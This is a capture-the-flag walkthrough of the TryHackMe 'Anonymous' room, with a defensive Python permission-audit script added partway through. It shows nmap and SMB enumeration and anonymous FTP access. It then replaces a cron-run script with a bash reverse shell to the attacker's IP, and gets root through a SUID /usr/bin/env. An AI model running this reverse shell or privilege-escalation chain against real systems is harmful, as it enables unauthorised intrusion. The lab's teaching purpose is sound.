tryhackme-[Anonymous]

0x01.Demo

0x02.Information Gathering

The scan shows four open ports, 21/22/139/445. FTP allows anonymous login, and the only directory exposed is scripts.

root@JIYE:~/tryhackme/anonymous# nmap -sC -sV -sT 10.10.7.51 -oN nmap.CVT
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-13 00:46 EST
Nmap scan report for 10.10.7.51
Host is up (0.36s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.9.248.83
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 5
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8b:ca:21:62:1c:2b:23:fa:6b:c6:1f:a8:13:fe:1c:68 (RSA)
| 256 95:89:a4:12:e2:e6:ab:90:5d:45:19:ff:41:5f:74:ce (ECDSA)
|_ 256 e1:2a:96:a4:ea:8f:68:8f:cc:74:b8:f0:28:72:70:cd (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: ANONYMOUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1s, deviation: 2s, median: 0s
|_nbstat: NetBIOS name: ANONYMOUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: anonymous
| NetBIOS computer name: ANONYMOUS\x00
| Domain name: \x00
| FQDN: anonymous
|_ System time: 2021-01-13T05:48:13+00:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-01-13T05:48:11
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.83 seconds
root@JIYE:~/tryhackme/anonymous#

Listing the shares offered by the SMB service reveals a share named pics.

root@JIYE:~/tryhackme/anonymous# smbclient -L 10.10.7.51
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
pics Disk My SMB Share Directory for Pics
IPC$ IPC IPC Service (anonymous server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
root@JIYE:~/tryhackme/anonymous#

0x03.Anonymous FTP Login

Locate the files under the scripts directory and download them.

root@JIYE:~/tryhackme/anonymous# ftp 10.10.7.51
Connected to 10.10.7.51.
220 NamelessOne's FTP Server!
Name (10.10.7.51:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
226 Directory send OK.
ftp> cd scripts
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 946 Jan 13 05:47 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
226 Directory send OK.
ftp> get clean.sh
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for clean.sh (314 bytes).
226 Transfer complete.
314 bytes received in 0.00 secs (3.4820 MB/s)
ftp> get removed_files.log
local: removed_files.log remote: removed_files.log
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for removed_files.log (989 bytes).
226 Transfer complete.
989 bytes received in 0.57 secs (1.6842 kB/s)
ftp> get to_do.txt
local: to_do.txt remote: to_do.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for to_do.txt (68 bytes).
226 Transfer complete.
68 bytes received in 0.60 secs (0.1115 kB/s)
ftp>
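
The listing above is the core of the finding: clean.sh is world-writable and executable (-rwxr-xrwx) inside a world-writable directory on an anonymous FTP share. As an added audit example that is not part of the original writeup, the following parses Unix-style listing lines of the kind vsftpd returns and flags world-writable entries and setuid/setgid bits; the sample input is constructed from the lines above plus one constructed ls -l line for the SUID /usr/bin/env found later in the writeup.

```python
import re

# Constructed sample input: the four listing lines the FTP server returned above,
# plus one constructed "ls -l" line for the setuid /usr/bin/env found later.
SAMPLE_LISTING = """\
drwxrwxrwx 2 111 113 4096 Jun 04 2020 scripts
-rwxr-xrwx 1 1000 1000 314 Jun 04 2020 clean.sh
-rw-rw-r-- 1 1000 1000 946 Jan 13 05:47 removed_files.log
-rw-r--r-- 1 1000 1000 68 May 12 2020 to_do.txt
-rwsr-xr-x 1 root root 35000 Jan 01 2020 /usr/bin/env
"""

# Fields: mode, link count, owner, group, size, month, day, year-or-time, name.
LISTING_RE = re.compile(
    r"^(?P<mode>[-dl][rwxsStT-]{9})\s+\d+\s+\S+\s+\S+\s+\d+\s+"
    r"\S+\s+\d+\s+\S+\s+(?P<name>.+)$"
)


def parse_listing(text):
    """Yield (mode, name) for each Unix-style directory listing line."""
    for line in text.splitlines():
        m = LISTING_RE.match(line.strip())
        if m:
            yield m.group("mode"), m.group("name")


def audit_mode(mode):
    """Return the risky permission bits present in a 10-character mode string."""
    findings = []
    is_dir = mode[0] == "d"
    other_write = mode[8] == "w"      # 'w' in the "other" triplet (positions 7-9)
    other_exec = mode[9] in "xt"      # 'x', or 't' for sticky plus execute
    if other_write and is_dir:
        findings.append("world-writable directory")
    elif other_write and other_exec:
        findings.append("world-writable executable")
    elif other_write:
        findings.append("world-writable file")
    if mode[3] in "sS":               # setuid bit sits in the owner triplet
        findings.append("setuid")
    if mode[6] in "sS":               # setgid bit sits in the group triplet
        findings.append("setgid")
    return findings


def audit_listing(text):
    """Map each flagged entry name to its findings; clean entries are omitted."""
    report = {}
    for mode, name in parse_listing(text):
        findings = audit_mode(mode)
        if findings:
            report[name] = findings
    return report


print(audit_listing(SAMPLE_LISTING))
```

Run against the real share, the same check turns the nmap "[NSE: writeable]" hint into a per-file finding and explains why a cron-executed script in that directory is a problem.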

0x04.Inspecting the Files

clean.sh turns out to be a script that removes files under /tmp; the other two files contain nothing useful.

root@JIYE:~/tryhackme/anonymous# cat clean.sh 
#!/bin/bash

tmp_files=0
echo $tmp_files
if [ $tmp_files=0 ]
then
echo "Running cleanup script: nothing to delete" >> /var/ftp/scripts/removed_files.log
else
for LINE in $tmp_files; do
rm -rf /tmp/$LINE && echo "$(date) | Removed file /tmp/$LINE" >> /var/ftp/scripts/removed_files.log;done
fi
root@JIYE:~/tryhackme/anonymous#

0x05.Reverse Shell

Modify clean.sh and upload it; the file contents are as follows.

root@JIYE:~/tryhackme/anonymous# cat clean.sh 
#!/bin/bash
bash -i >& /dev/tcp/10.9.248.83/6666 0>&1

Shell exploitation

Overwrite the file on the server.

ftp> put clean.sh clean.sh 
local: clean.sh remote: clean.sh
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
54 bytes sent in 0.00 secs (1.0098 MB/s)
ftp>

Listen on the port from Kali; wrapping nc in rlwrap makes the up/down arrow keys usable in the resulting shell.

root@JIYE:~/tryhackme/anonymous# rlwrap nc -nvlp 6666
listening on [any] 6666 ...
connect to [10.9.248.83] from (UNKNOWN) [10.10.136.156] 49676
bash: cannot set terminal process group (1144): Inappropriate ioctl for device
bash: no job control in this shell
whoami
whoami
namelessone
ls
ls
pics
user.txt
cat user.txt
cat user.txt
****************************

0x06.Privilege Escalation

Escalate privileges via a SUID binary.

find / -perm -4000 2>/dev/null
or
find / -perm -u=s -type f 2>/dev/null

/usr/bin/env

Reference for privilege escalation through env

/usr/bin/env /bin/sh -p
id
uid=1000(namelessone) gid=1000(namelessone) euid=0(root) groups=1000(namelessone),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
ls
pics
user.txt
pwd
/home/namelessone
cd /root
pwd
/root
ls
root.txt
cat root.txt
*************************
-------------Short on paper, long on feeling. See you next time-------------